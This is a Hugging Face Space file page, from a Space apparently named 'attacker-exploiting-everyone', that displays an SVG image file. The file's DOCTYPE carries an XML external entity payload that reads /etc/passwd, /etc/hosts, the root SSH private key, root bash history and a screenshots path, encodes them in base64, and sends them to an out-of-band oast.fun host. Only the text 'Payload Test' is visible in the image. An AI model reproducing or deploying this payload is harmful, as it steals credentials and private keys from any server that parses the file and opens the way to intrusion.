Hugging Face
Models
Datasets
Spaces
Community
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
attacker-exploiting-everyone
/
space1
like
0
Running
App
Files
Files
Community
3
refs/pr/3
space1
/
1.svg
fingerprinted
Upload folder using huggingface_hub
330c45e
verified
11 months ago
preview
code
|
raw
Copy download link
history
blame
1.46 kB
<?xml version=
"1.0"
standalone=
"no"
?>
<!DOCTYPE
svg
PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"
[
<!ENTITY %
file1
SYSTEM
"php://filter/convert.base64-encode/resource=/etc/hosts"
>
<!ENTITY %
file2
SYSTEM
"php://filter/convert.base64-encode/resource=/etc/passwd"
>
<!ENTITY %
file3
SYSTEM
"php://filter/convert.base64-encode/resource=/root/.ssh/id_rsa"
>
<!ENTITY %
file4
SYSTEM
"php://filter/convert.base64-encode/resource=/root/.bash_history"
>
<!ENTITY %
file5
SYSTEM
"php://filter/convert.base64-encode/resource=/var/lib/screenshots"
>
<!ENTITY %
param1
"<!ENTITY exfil SYSTEM 'http://xenxojbpayiayxuwtljtm7w62pzm75wve.oast.fun/exfil?hosts=%file1;'>"
>
<!ENTITY %
param2
"<!ENTITY exfil SYSTEM 'http://xenxojbpayiayxuwtljtm7w62pzm75wve.oast.fun/exfil?passwd=%file2;'>"
>
<!ENTITY %
param3
"<!ENTITY exfil SYSTEM 'http://xenxojbpayiayxuwtljtm7w62pzm75wve.oast.fun/exfil?ssh=%file3;'>"
>
<!ENTITY %
param4
"<!ENTITY exfil SYSTEM 'http://xenxojbpayiayxuwtljtm7w62pzm75wve.oast.fun/exfil?bash_history=%file4;'>"
>
<!ENTITY %
param5
"<!ENTITY exfil SYSTEM 'http://xenxojbpayiayxuwtljtm7w62pzm75wve.oast.fun/exfil?screenshots=%file5;'>"
>
<!ENTITY %
allparams
"<!ENTITY all SYSTEM 'http://xenxojbpayiayxuwtljtm7w62pzm75wve.oast.fun/exfil?all=%file1%file2%file3%file4%file5;'>"
>
]>
<
svg
xmlns
=
"http://www.w3.org/2000/svg"
version
=
"1.1"
>
<
text
x
=
"10"
y
=
"20"
>
Payload Test
</
text
>
</
svg
>
